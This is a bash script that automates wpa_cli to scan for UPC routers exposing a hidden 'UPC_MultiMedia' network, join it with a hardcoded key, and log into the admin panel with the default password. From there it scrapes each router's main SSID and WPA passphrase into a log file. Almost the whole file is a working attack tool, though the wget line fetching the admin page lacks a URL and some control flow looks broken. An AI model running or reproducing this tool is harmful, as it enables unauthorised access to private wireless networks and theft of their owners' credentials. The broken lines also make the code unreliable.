#!/bin/bash ### # This script automates wpa_cli to scan for vulnerable routers that have a UPC_MultiMedia ("hidden") SSID, # connect to those networks and grab the credentials to the main SSID (UPCXXXXXX) from the admin panel. ### # This file will contain the output of `wpa_cli scan` infile="/tmp/${RANDOM}" WPA_BIN=/usr/bin/wpa_cli # How many seconds to wait until wpa_cli's status shows COMPLETED AUTH_LIMIT=15 INTERFACE="wlan3" WPA="${WPA_BIN} -i ${INTERFACE}" MULTIMEDIANET=`$WPA list_net | awk '$2 == "UPC_MultiMedia" {print $1}' | head -1` # How many seconds to wait until we got an IP after successfully connecting IP_WAIT_LIMIT=30 # Try to grab credentials this many times MAXTRIES=30 # Terminate if our scan is older than this many seconds MAXAGE=60 #rm /tmp/resolved.bssids touch /tmp/resolved.bssids ### # Either use the scan file given as parameter or start off by scanning for networks ourselves with wpa_cli ### if [ $# -lt 1 ] then echo "No scanfile given as parameter, scanning..." $WPA scan > /dev/null echo "Scan initated, waiting 5 seconds" sleep 5 $WPA scan_results | tail -n +3 > "$infile" echo "Scan written to tmp file ${infile}" else echo "Using scanfile $1" infile="$1" fi # Set end timestamp; the script will stop after this time (hint: use it in a loop) let TERMTIME=`date '+%s'`+$MAXAGE ### # Set up the UPC_MultiMedia network if it's not already in wpa_cli ### if [ -n "$MULTIMEDIANET" ] then echo "Found UPC_MultiMedia at number $MULTIMEDIANET" else echo "UPC_MultiMedia network not found in wpa_supplicant, adding." MULTIMEDIANET=`$WPA add_net | tail -1` echo "Created UPC_MultiMedia as network ${MULTIMEDIANET}, now setting params" $WPA set_net "$MULTIMEDIANET" ssid '"UPC_MultiMedia"' > /dev/null $WPA set_net "$MULTIMEDIANET" disabled 1 > /dev/null $WPA set_net "$MULTIMEDIANET" psk '"UPC3532MM0394719edAE"' > /dev/null $WPA set_net "$MULTIMEDIANET" scan_ssid 1 > /dev/null echo "Param setup complete." fi ### # Iterate over all potential target networks and try to connect if they match the pattern ### awk '/^02:/ {print $1;}' $infile | while read bssid do if [ -n "`grep $bssid /tmp/resolved.bssids`" ] then continue fi echo "Trying to find matching parent BSSID for $bssid" parent=`echo -n $bssid | awk -F ':' '{last=strtonum("0x"$6); printf("00:%s:%s:%s:%s:%2x", $2,$3,$4,$5,last-1);}'` #echo "Parent BSSID would be $parent" if [ `grep -ic "$parent" "$infile"` = "1" ]; then echo "Found parent BSSID!" $WPA disconnect > /dev/null $WPA set_network "$MULTIMEDIANET" bssid "$bssid" > /dev/null $WPA select_net "$MULTIMEDIANET" > /dev/null $WPA reconnect > /dev/null # Wait for AUTH_LIMIT seconds, then check the status let "limit=${AUTH_LIMIT}" echo -n "Waiting for connection (max ${AUTH_LIMIT} seconds)" while [ `date '+%s'` -le $TERMTIME -a $limit -ge 0 -a `$WPA status | grep wpa_state` != "wpa_state=COMPLETED" ] do sleep 1 echo -n "." let "limit=${limit}-1" done # If status ok, then output 0, otherwise 1 if [ `$WPA status | grep wpa_state` = "wpa_state=COMPLETED" ] then echo echo "Connected. Now checking if we're root." if [ $EUID -eq 0 ] then echo "We are root, so we can set our IP instantly. Great!" ifconfig "$INTERFACE" && echo "IP successfully set" else echo "Not root, have to wait for DHCP-assigned address." waitround=1 echo -n "Waiting for IP (max ${IP_WAIT_LIMIT} seconds)" while [ `date '+%s'` -le $TERMTIME -a "0" = `$WPA status | grep -c ip_address` -a ${waitround} -le ${IP_WAIT_LIMIT} ] do sleep 1 echo -n "." let "waitround=${waitround}+1" done if [ "0" = `$WPA status | grep -c ip_address` ] then echo echo "Did not get IP, can not execute autoscript." return 1 fi fi # Now do the actual work - try to grab the admin page credentials="" echo echo -n "Trying to grab credentials (max ${MAXTRIES} tries)" let tries=0 while [ -z "$credentials" -a `date '+%s'` -le $TERMTIME -a $tries -lt $MAXTRIES ] do #TODO limit retries... credentials=`wget --timeout=5 --password=admin --user="" --no-proxy -O - 2>/dev/null | egrep '(name="ServiceSetIdentifier"|name="WpaPreSharedKey")' | awk -F '"' '{i=NF-1;print $i}' | tr '\n' ' '` if [ -z "$credentials" ] then echo -n "." if [ -z "`$WPA status | grep COMPLETED`" ] then echo "OOPS, disconnected." continue 2 fi sleep 2 else echo echo "[SUCCESS] ${credentials}" echo "${bssid} ${credentials}" >> /tmp/resolved.bssids continue 2 fi let tries=tries+1 done else echo "Connection could not be established to ${bssid}." fi echo "[DEBUG] Disabling/disconnecting UPC_MultiMedia" $WPA set_net "$MULTIMEDIANET" disabled 1 >/dev/null $WPA disconnect >/dev/null #SINGLE RUN, comment if you want more exit 0 else echo "Parent BSSID could not be found, ignoring this BSSID." fi done